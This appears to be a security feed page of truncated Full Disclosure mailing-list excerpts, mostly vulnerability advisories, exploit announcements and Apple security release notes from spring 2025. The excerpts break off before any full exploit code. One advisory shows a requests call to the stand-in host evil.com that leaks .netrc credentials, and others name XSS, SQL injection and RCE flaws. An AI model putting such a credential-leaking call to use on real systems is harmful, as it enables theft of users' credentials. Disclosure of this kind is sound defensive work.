Category: Alert Feeds

  Posted by josephgoyd via Fulldisclosure on Jun 09 Hello Full Disclosure, This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and undetectable crypto wallet exfiltration. Despite responsible disclosure, … Read More “Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain → Secure Enclave Key Theft, Wormable RCE, Crypto Theft  – Full Disclosure” »

  Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 09 SEC Consult Vulnerability Lab Security Advisory < 20250604-0 > ======================================================================= title: Local Privilege Escalation and Default Credentials product: INDAMED – MEDICAL OFFICE (Medical practice management) Demo version vulnerable version: Revision 18544 (II/2024) fixed version: Q2/2025 (Privilege Escalation, Default Password)… – Read More  – Full … Read More “SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED – MEDICAL OFFICE (Medical practice management) Demo version  – Full Disclosure” »

  Posted by Sanjay Singh on Jun 03 Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ———————————————————————— CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ———————————————————————— Product: CloudClassroom PHP Project Vendor:… – Read More  – Full Disclosure 

  Posted by Stefan Kanthak on Jun 03 Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicies] respectively [HKEY_CURRENT_USERSoftwarePolicies] and below, where only the SYSTEM account and members of the “Administrators” user group are granted write access. At logon the user’s registry hive “%USERPROFILE%ntuser.dat” is loaded with exclusive (read, write and… – Read … Read More “Defense in depth — the Microsoft way (part 89): user group policies don’t deserve tamper protection  – Full Disclosure” »

  Posted by Ron E on Jun 03 An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:*POST … Read More “ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path  – Full Disclosure” »

  Posted by Andrey Stoykov on Jun 03 # Exploit Title: IDOR “Change Password” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR “Change Password” Functionality #1: Steps to Reproduce: 1. Login as user with low privilege and visit profile page … Read More “IDOR “Change Password” Functionality – adaptcmsv3.0.3  – Full Disclosure” »

  Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS via File Upload – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit “Profile” … Read More “Stored XSS via File Upload – adaptcmsv3.0.3  – Full Disclosure” »

  Posted by Qualys Security Advisory via Fulldisclosure on Jun 03 Qualys Security Advisory Local information disclosure in apport and systemd-coredump (CVE-2025-5054 and CVE-2025-4598) ======================================================================== Contents ======================================================================== Summary Mitigation Local information disclosure in apport (CVE-2025-5054) – Background – Analysis – Proof of concept Local information disclosure in systemd-coredump… – Read More  – Full Disclosure 

  Posted by Jacek Lipkowski via Fulldisclosure on Jun 03 Hi, I made a novel honeypot for worms called Youpot. Normally a honeypot will try to implement whatever service it thinks the attacker would like. For a high interaction or pure honeypot this is often impossible, because of the thousands of possibilities. Even a simple … Read More “Youpot honeypot  – Full Disclosure” »

  Posted by Housma mardini on Jun 03 Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin Mardinli *Vendor Homepage*: https://warfareplugins.com/ *Software Link*: https://wordpress.org/plugins/social-warfare/ … Read More “Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)  – Full Disclosure” »

  Posted by Juho Forsén via Fulldisclosure on Jun 03 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get(‘http://example.com:@evil.com/&apos😉 Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. … Read More “CVE-2024-47081: Netrc credential leak in PSF requests library  – Full Disclosure” »

  Posted by Michał Majchrowicz via Fulldisclosure on Jun 03 Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: May 6, 2025 Vendor confirmed … Read More “Multiple Vulnerabilities in SAP GuiXT Scripting  – Full Disclosure” »

  Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS in “Description” Functionality – cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit “Account” > “Address Book” and choose “Edit” 2. In the … Read More “Stored XSS in “Description” Functionality – cubecartv6.5.9  – Full Disclosure” »

  Posted by Andrey Stoykov on Jun 03 # Exploit Title: Authenticated File Upload to RCE – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE #1: Steps to Reproduce: 1. Login as admin user and visit “System” > … Read More “Authenticated File Upload to RCE – adaptcmsv3.0.3  – Full Disclosure” »

  Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS “Send Message” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS “Send Message” Functionality #1: Steps to Reproduce: 1. Login as normal user and visit “Profile” > … Read More “Stored XSS “Send Message” Functionality – adaptcmsv3.0.3  – Full Disclosure” »

  Posted by Ron E on May 27  An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause. Sample Structured Query Language Injection: … Read More “Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework  – Full Disclosure” »

  Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 27 SEC Consult Vulnerability Lab Security Advisory < 20250521-0 > ======================================================================= title: Multiple Vulnerabilities product: eCharge Hardy Barth cPH2 and cPP2 charging stations vulnerable version: 2.2.0 fixed version: Not available CVE number: CVE-2025-27803, CVE-2025-27804, CVE-2025-48413, CVE-2025-48414, CVE-2025-48415,… – Read More  – Full Disclosure 

  Posted by Shaikh Shahnawaz on May 16 [+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC [+] twitter.com/_striv3r_ [Vendor of Product] RSI Queue (https://www.rsiqueue.com/) [Vulnerability Type] Blind SQL Injection [Affected Component] The vulnerable component is the TaskID parameter in the get request. [CVE Reference] CVE-2025-26086 [Security Issue] An unauthenticated blind SQL injection vulnerability … Read More “Unauthenticated Blind SQL Injection | RSI queue management system – V 3.0 | CVE-2025-26086  – Full Disclosure” »

  Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16 SEC Consult Vulnerability Lab Security Advisory < 20250422-0 > ======================================================================= title: Local Privilege Escalation via DLL Search Order Hijacking product: Ivanti Endpoint Manager Security Scan (Vulscan) Self Update vulnerable version: EPM 2022 SU6 and previous, EPM 2024 fixed version: EPM 2022 SU7 and … Read More “SEC Consult SA-20250422-0:: Local Privilege Escalation via DLL Search Order Hijacking  – Full Disclosure” »

  Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16 SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 > Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise ======================================================================= title: Multiple Vulnerabilities product: HP Wolf Security Controller / HP Sure Access Enterprise / HP Sure Click Enterprise vulnerable version: … Read More “SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP Wolf Security Controller and more  – Full Disclosure” »

  Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16 SEC Consult Vulnerability Lab Security Advisory < 20250507-0 > ======================================================================= title: Authenticated Command Injection product: Honeywell MB-Secure vulnerable version: MB-Secure versions from V11.04 and prior to V12.53, MB-Secure PRO versions from V01.06 and prior to V03.09 fixed version: MB-Secure v12.53, MB-Secure PRO v03.09 … Read More “SEC Consult SA-20250506-0 :: Honeywell MB Secure Authenticated Command Injection  – Full Disclosure” »

  Posted by Sebastian Auwärter via Fulldisclosure on May 16 Advisory ID: SYSS-2025-006 Product: Tiiwee X1 Alarm System Manufacturer: Tiiwee B.V. Affected Version(s): TWX1HAKV2 Tested Version(s): TWX1HAKV2 Vulnerability Type: Authentication Bypass by Capture-replay (CWE-294) Risk Level: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N Solution Status: Open Manufacturer Notification: 2025-01-27… – Read More  – Full Disclosure 

  Posted by Ron E on May 16 A persistent cross-site scripting (XSS) vulnerability exists in gugoan’s Economizzer v.0.9-beta1. The application fails to properly sanitize user-supplied input when creating a new category via the *category/create *endpoint. An attacker can inject malicious JavaScript payloads that are permanently stored and later executed in the context of any … Read More “Persistent Cross-Site Scripting in Economizzer Category Entry  – Full Disclosure” »

  Posted by Ron E on May 16 A session management vulnerability exists in gugoan’s Economizzer v.0.9-beta1. The application fails to properly invalidate user sessions upon logout or other session termination events. As a result, a valid session remains active and usable even after the user has attempted to log out. POST /web/category/create HTTP/2 Host: … Read More “Session Invalidation in Economizzer Allows Unauthorized Access After Logout  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-8 visionOS 2.5 visionOS 2.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122721. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: Apple Vision Pro Impact: Processing a … Read More “APPLE-SA-05-12-2025-8 visionOS 2.5  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-9 Safari 18.5 Safari 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122719. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. WebKit Available for: macOS Ventura and macOS Sonoma Impact: … Read More “APPLE-SA-05-12-2025-9 Safari 18.5  – Full Disclosure” »

  Posted by Ron E on May 16 A persistent cross-site scripting (XSS) vulnerability exists in gugoan’s Economizzer v.0.9-beta1 The application fails to properly sanitize user-supplied input when creating a new cash book entry via the *cashbook/create* endpoint. An attacker can inject malicious JavaScript payloads that are permanently stored and later executed in the context … Read More “Persistent Cross-Site Scripting in Economizzer Cashbook Entry  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6 macOS Ventura 13.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122718. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. afpfs Available for: macOS Ventura Impact: Mounting … Read More “APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-6 watchOS 11.5 watchOS 11.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122722. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: Apple Watch Series 6 and later … Read More “APPLE-SA-05-12-2025-6 watchOS 11.5  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-7 tvOS 18.5 tvOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122720. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: Apple TV HD and Apple TV … Read More “APPLE-SA-05-12-2025-7 tvOS 18.5  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-2 iPadOS 17.7.7 iPadOS 17.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/122405. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AirDrop Available for: iPad Pro 12.9-inch 2nd generation, iPad … Read More “APPLE-SA-05-12-2025-2 iPadOS 17.7.7  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-3 macOS Sequoia 15.5 macOS Sequoia 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122716. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. afpfs Available for: macOS Sequoia Impact: Connecting … Read More “APPLE-SA-05-12-2025-3 macOS Sequoia 15.5  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6 macOS Sonoma 14.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122717. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. afpfs Available for: macOS Sonoma Impact: Connecting … Read More “APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5 iOS 18.5 and iPadOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122404. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: … Read More “APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5  – Full Disclosure” »

  Posted by CVE – VULSec Labs via Fulldisclosure on May 16 === SUMMARY === Vendor: ArcGIS Product: ArcGIS Subject: ArcGIS Hidden Functionality Allows Insecure OAuth 2.0 Based Authentication – CVE-2025-0020 VSL-2025-21 CVSS: 7.9 (high) CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/U:Amber Credit: Erez Kalman Author: VULSec Labs Date: 2025-05-14 === DETAILS === CWE/CAPEC: Violation of Secure Design Principles, Hidden Functionality, Incorrect Provision … Read More “ArcGIS Hidden Functionality Allows Insecure OAuth 2.0 Based Authentication – CVE-2025-0020 VSL-2025-21  – Full Disclosure” »

  Posted by Flo Schäfer via Fulldisclosure on May 16 secuvera-SA-2025-01: Privilege Escalation Affected Products Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1 References secuvera-SA-2025-01 CVE not assigned yet CWE-426: Untrusted Search Path CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L Summary: An agent configured to run in privileged mode using the SetUID-Bit can be used to escalate privileges, by supplying an … Read More “secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix  – Full Disclosure” »

  Posted by Egidio Romano on May 16 ————————————————————————— Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability ————————————————————————— [-] Software Link: https://invisioncommunity.com [-] Affected Versions: All versions from 5.0.0 to 5.0.6. [-] Vulnerability Description: The vulnerability is located in the… – Read More  – Full Disclosure 

  Posted by Paul Szabo via Fulldisclosure on May 06 === Details ======================================================== Vendor: BeyondTrust Product: Privileged Remote Access (PRA) Subject: PRA connection takeover CVE ID: CVE-2025-0217 CVSS: 7.8 (high) CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Author: Paul Szabo <psz () maths usyd edu au> Date: 2025-05-05 === Introduction =================================================== I noticed an issue in BeyondTrust Privileged… – Read More  – … Read More “BeyondTrust PRA connection takeover – CVE-2025-0217  – Full Disclosure” »

  Posted by hyp3rlinx on May 01 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vulnerability Type] NTLM Hash Disclosure (Spoofing) [Video URL PoC] https://www.youtube.com/watch?v=d5U_krLQbNY [CVE Reference] N/A [Security Issue] The… – Read More  – Full Disclosure 

  Posted by hyp3rlinx on Apr 26 [-] Microsoft “.library-ms” File / NTLM Information Disclosure Spoofing (Resurrected 2025) / CVE-2025-24054 [+] John Page (aka hyp3rlinx) [+] x.com/hyp3rlinx [+] ISR: ApparitionSec Back in 2018, I reported a “.library-ms” File NTLM information disclosure vulnerability to MSRC and was told “it was not severe enough”, that being said … Read More “Microsoft “.library-ms” File / NTLM Information Disclosure (Resurrected 2025)  – Full Disclosure” »

  Posted by Daniel Owens via Fulldisclosure on Apr 26 Good morning. All current versions and all versions since the 2022/2023 “fix” to the Rails cross-site request forgery (CSRF) protections continue to be vulnerable to the same attacks as the 2022 implementation. Currently, Rails generates “authenticity tokens” and “csrf tokens” using a random “one time … Read More “Ruby on Rails Cross-Site Request Forgery  – Full Disclosure” »

  Posted by Daniel Owens via Fulldisclosure on Apr 26 Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of service and information disclosure attacks (among other things) because the information system directly exposes the C# reflection used during the request-action mapping process and fails to properly protect certain pathways. These are amplified by … Read More “Inedo ProGet Insecure Reflection and CSRF Vulnerabilities  – Full Disclosure” »

  Posted by Artur Janicki via Fulldisclosure on Apr 26 [APOLOGIES FOR CROSS-POSTING] CALL FOR PAPERS 14th International Workshop on Cyber Crime (IWCC 2025 – https://2025.ares-conference.eu/program/iwcc/) to be held in conjunction with the 20th International Conference on Availability, Reliability and Security (ARES 2025 – http://2025.ares-conference.eu) August 11-14, 2025, Ghent, Belgium IMPORTANT DATES Submission Deadline May … Read More “[IWCC 2025] CfP: 14th International Workshop on Cyber Crime – Ghent, Belgium, Aug 11-14, 2025  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on Apr 23 APPLE-SA-04-16-2025-4 visionOS 2.4.1 visionOS 2.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122402. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. CoreAudio Available for: Apple Vision Pro Impact: Processing an … Read More “APPLE-SA-04-16-2025-4 visionOS 2.4.1  – Full Disclosure” »

  Posted by Marco Ivaldi on Apr 23 Hi, Please find attached a security advisory that describes some vulnerabilities we discovered in the Zyxel uOS Linux-based operating system. * Title: Local privilege escalation via Zyxel fermion-wrapper * Product: USG FLEX H Series * OS: Zyxel uOS V1.31 (and potentially earlier versions) * Author: Marco Ivaldi … Read More “HNS-2025-10 – HN Security Advisory – Local privilege escalation in Zyxel uOS  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on Apr 23 APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1 iOS 18.4.1 and iPadOS 18.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122282. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. CoreAudio Available for: … Read More “APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1  – Full Disclosure” »

  Posted by Apple Product Security via Fulldisclosure on Apr 23 APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1 macOS Sequoia 15.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122400. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. CoreAudio Available for: macOS Sequoia Impact: Processing … Read More “APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1  – Full Disclosure” »